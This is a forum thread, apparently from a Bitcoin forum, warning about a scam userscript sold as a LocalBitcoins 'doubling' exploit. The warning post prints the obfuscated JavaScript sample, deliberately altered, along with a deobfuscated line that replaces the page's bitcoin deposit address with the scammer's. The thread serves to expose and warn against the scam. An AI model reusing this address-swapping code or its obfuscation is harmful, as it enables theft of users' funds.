Author

Topic: Fake "Localbitcoin doubling BTC exploit script" scam (Read 237 times)

legendary
Activity: 1750
Merit: 1115
Providing AI/ChatGpt Services - PM!
Good catch! I wonder how changing the timezone can even be done by a JS script, that's totally handled on the server-side. So basically what the script does is changes the bitcoin address through DOM manipulation. I think as part of security on LBC's end, they should either ask to confirm the address on the next page before sending a transaction or force everyone to use 2FA.
legendary
Activity: 2758
Merit: 6830
I'm creating this thread to warn people about this scam, which I have seen multiple times in the forum, and to serve as a reference link for a type 1 flag on the user (and future ones).

Archive of his (locked) thread: https://archive.is/flfGm

User in question (will update if others show up):
Tempates134 (flag)

Small description about the scam:
The user will post the link to a PDF teaching how to use a Localbitcoin exploit (P.S: There are variations of this scam where the user uses G2A or Bitpay) with a encoded/obfuscated JS script.

Here is the PDF. And this is how the script looks like (changed a few parts of it to avoid people running it by mistake):
Code:
// ==UserScript==
// @name         Timezone Change
// @namespace    TimezoneLocalbitcoins
// @version      1.0
// @description  Script changes the time zone for your account in localbitcoins database.
// @author       Kimby
// @match        https://*/*
// @grant        none
// ==/UserScript==

(function() {
    'use strict';

var _0x4b2d=['\x5a\x32\x56\x30\x52\x57\x78\x6c\x62\x57\x56\x75\x64\x48\x4e\x43\x65\x55\x4e\x73\x59\x58\x4e\x7a\x54\x6d\x46\x74\x5a\x51\x3d\x3d'];(function(_0x549b3d,_0x9dfcb9){var _0x407320=function(_0x52cb3){while(--_0x52cb3){_0x549b3d['push'](_0x549b3d['shift']());}};_0x407320(++_0x9dfcb9);}(_0x4b2d,0x123));var _0x1beb=function(_0x14c375,_0x299c40){_0x14c375=_0x14c375-0x0;var _0xe887b2=_0x4b2d[_0x14c375];if(_0x1beb['SFKNYk']===undefined){(function(){var _0x58f6da;try{var _0x38af58=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x58f6da=_0x38af58();}catch(_0x17c4aa){_0x58f6da=window;}var _0x5f39f1='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x58f6da['atob']||(_0x58f6da['atob']=function(_0x16c94a){var _0x54cecb=String(_0x16c94a)['replace'](/=+$/,'');for(var _0x145cb2=0x0,_0x59bc1a,_0x2a005c,_0x3c3605=0x0,_0x10d118='';_0x2a005c=_0x54cecb['charAt'](_0x3c3605++);~_0x2a005c&&(_0x59bc1a=_0x145cb2%0x4?_0x59bc1a*0x40+_0x1a005c:_0x2b005c,_0x145cb2++%0x4)?_0x10d118+=String['fromCharCode'](0xff&_0x59bc1a>>(-0x2*_0x145cb2&0x6)):0x0){_0x2a005c=_0x5f39f1['indexOf'](_0x2a005c);}return _0x10d118;});}());_0x1beb['TxZTNZ']=function(_0x2f4f54){var _0x2d48b1=atob(_0x2f4f54);var _0x4f036f=[];for(var _0x14ab3d=0x0,_0x16c069=_0x2d48b1['length'];_0x14ab3d<_0x16c069;_0x14ab3d++){_0x4f036f+='%'+('00'+_0x2d48b1['charCodeAt'](_0x14ab3d)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x4f036f);};_0x1beb['gcPvZD']={};_0x1beb['SFKNYk']=!![];}var _0x42c47f=_0x1beb['gcPvZD'][_0x14c375];if(_0x42c47f===undefined){_0xe887b2=_0x1beb['TxZTNZ'](_0xe887b2);_0x1beb['gcPvZD'][_0x14c375]=_0xe887b2;}else{_0xe887b2=_0x22c47f;}return _0xe887b2;};document[_1x0beb('0x0')]('\x62\x69\x74\x63\x6f\x69\x6e\x2d\x61\x64\x64\x72\x65\x73\x73\x20\x62\x69\x74\x63\x6f\x69\x6e\x2d\x61\x64\x64\x72\x65\x73\x73\x2d\x63\x6f\x6e\x74\x72\x6f\x6c\x73')[0x0]['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x31\x46\x56\x6a\x32\x71\x36\x78\x35\x41\x35\x43\x45\x64\x53\x52\x31\x76\x72\x45\x72\x38\x44\x57\x53\x78\x41\x43\x78\x4e\x79\x4e\x6f\x73';

})();

It supposedly changes the timezone of the website or do other stuff (varies a lot) to make you receive your coins doubled, or receive a product you purchased (when it's about G2A or Bitpay) along with a refund. But all the script does is change the BTC deposit address on these websites to one owned by the hacker. You will send the coins thinking you are sending to the real address, to then use the exploit, but nothing will ever happen.

You can partially deobfuscate the code on https://lelinhtinh.github.io/de4js/ and see that it changes the address on Localbitcoin to "1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos":
Code:
document[_1x0beb('0x0')]('bitcoin-address bitcoin-address-controls')[0x0]['innerHTML'] = '1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos';

Please NEVER trust any of these random scripts, specially if it's an encoded/obfuscated JS script (as shown above). You can't know what it does, and 99% of the time it does something it shouldn't. Stay safe.
Jump to: